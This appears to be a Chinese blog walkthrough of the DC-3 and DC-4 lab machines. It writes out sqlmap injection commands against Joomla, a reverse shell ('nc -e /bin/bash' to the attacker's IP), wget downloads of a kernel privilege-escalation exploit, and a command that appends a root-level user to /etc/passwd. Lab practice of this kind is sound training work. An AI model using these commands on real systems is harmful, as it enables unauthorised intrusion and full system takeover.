【DC系列03】DC-3靶机复盘
最近打了特别多的靶机,DC系列已经打完了,还打了一些别的靶机,有特别难的,也有很简单的,现在发现打靶机真的好玩,甚至有点上瘾,还学习到了很多工具的用法,陆续把DC系列发完就发别的靶机,再发一些工具的用法,教程中如果有看不懂的,或者觉得我少步骤的,留言就可以,我会补充的,放心,每天我都会在论坛冲浪,可能不发言,但一定会在论坛飘来飘去。
下载地址:https://www.five86.com/downloads.html
刚开始我的虚拟机导入靶机,打开时会出现这个错误,只需要添加一个硬盘就可以,选择IDE的。
然后我们扫描一下靶机ip地址
扫出来以后再单独扫描一下这个网站。
登陆这个ip以后指纹识别发现这个网站CMS是Joomla,我知道一个专门针对joomla的扫描工具,我们扫描一下。
我们扫描出两个重要内容,一个是joomla的版本,一个是他的登陆页面。
我们针对这个版本搜索一下他的漏洞,发现刚好有一个可以利用的,我们下载下来。
发现这是一个sql注入的漏洞,可以可以sqlmap这个工具实现sql注入,不懂的可以单独搜索一下sqlmap这个工具。
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password,username" --dump -p list[fullordering]
经过一系列操作我们成功拿到了一个账号密码,但是密码是密文的。
利用kali自带的john工具爆破一下密码,很快密码就出来了
尝试登陆了一下这个后台,发现成功登陆了上去。
在 这里面搜索了一圈,发现一个可以注入php代码的地方,经过尝试很轻易的就做了一个反弹shell。
这里面是有两个主页的模板,这里面有前端代码,可以自己新建php文件,也可以在原本php文件中插入代码。
我点进来以后在html文件下面找到了个php文件,然后插入了一段反弹shell。然后关闭这个页面,在最上面一行Close File。
点击预览,或者退出这个页面,重新点击这个模板。
kali这边就拿到了反弹shell。
用python美化一下命令行。
在这里面找了一圈并没有发现有什么可以利用的东西,就想到了内核漏洞,专门搜索了一下这个内核漏洞,发现这个系统的发行版本是16.06,内核版本是4.40。
搜索一下这个发行版本的漏洞,发现有合适的。
下载后cat一下,里面有一个提权代码的路径,我们wget一个这个zip,下载到我们本机上。
解压后发现两个文件,一个crasher.tar,一个exploit.tar,我们解压一下exploit.tar,解压出一个目录ebpf_mapfd_doubleput_exploit。
我们把ebpf_mapfd_doubleput_exploit里面的东西都拷贝到目标主机。
cd /tmp
wget 192.168.102.129/compile.sh
wget 192.168.102.129/doubleput.c
wget 192.168.102.129/hello.c
wget 192.168.102.129/suidhelper.c
然后我们运行./compil.sh。
运行完后出现一个doubleput文件,我们再运行一下./doubleput大概等1分钟就拿到root权限了。
【DC系列04】DC-4靶机复盘
首先nmap扫ip,我这里扫出来ip了,然后对这个ip做一个单独的扫描。
扫描ip的同时再扫描一下目录,其实目录并没有扫描出来一个什么,有个登陆地址但是转到主目录了。
搜寻了一圈并没有什么好利用的点,从这个登陆框很容易看出来登陆用户名是admin,可以根据这个进行一个爆破,很快密码就爆破出来了,是个弱密码。
进来以后发现有个Command,点击run发现这是一个ls命令,所以我们就抓包看看能不能修改一下
看到这里空格是用+号代替了,我们尝试放一个反弹shell
nc+-e+/bin/bash+192.168.102.129+8888
kali这边监听一下,发现获取到了该靶机的webshell
首先使用python命令美化一下命令行。
python3 -c "import pty;pty.spawn('/bin/bash')"
登陆以后在里面寻找了一下,发现在/home/jim/backups目录下有一个old-passwords.bak文件,这是一个旧密码文件,里面有很多密码,所以就猜测需要用到密码爆破。
hydra爆破一下jim用户,很快密码就出来了。
远程登陆一下jim用户。
登陆到jim用户后在家目录找了一圈发现并没有可以利用的东西,但是在/var下有个mail目录,这是一个邮件目录,所以这里面可能有什么邮件信息比较关键。
打开后发现有一个charles写给jim的邮件,里面有charles的密码,我们就尝试登陆一下charles用户。
很轻松,顺利就登陆上去了。
sudo -l一下发现在有个免密使用root权限的文件/usr/bin/teehee
teehee -help后发现这个文件执行后可以以root权限免密往另一个文件内容后追加内容,所以我们可以利用这个漏洞往/etc/passwd文件下追加一个root用户。
我们的密码追加时候需要以密文的方式追加,如果直接追加明文密码登陆时候会鉴权失败。
这个命令是针对我们的密码和用户输出一个密码的密文。
#得到我们要添加的用户的密码。
perl -le 'print crypt("123456", "tang6")'
利用sudo teehee和echo命令就可以追加到/etc/passwd
su tang6登陆一下,密码123456,发现已经是root权限了。
echo "tang6:tarRU/F9EJjRU:0:0:root::/bin/bash" | sudo teehee -a /etc/passwd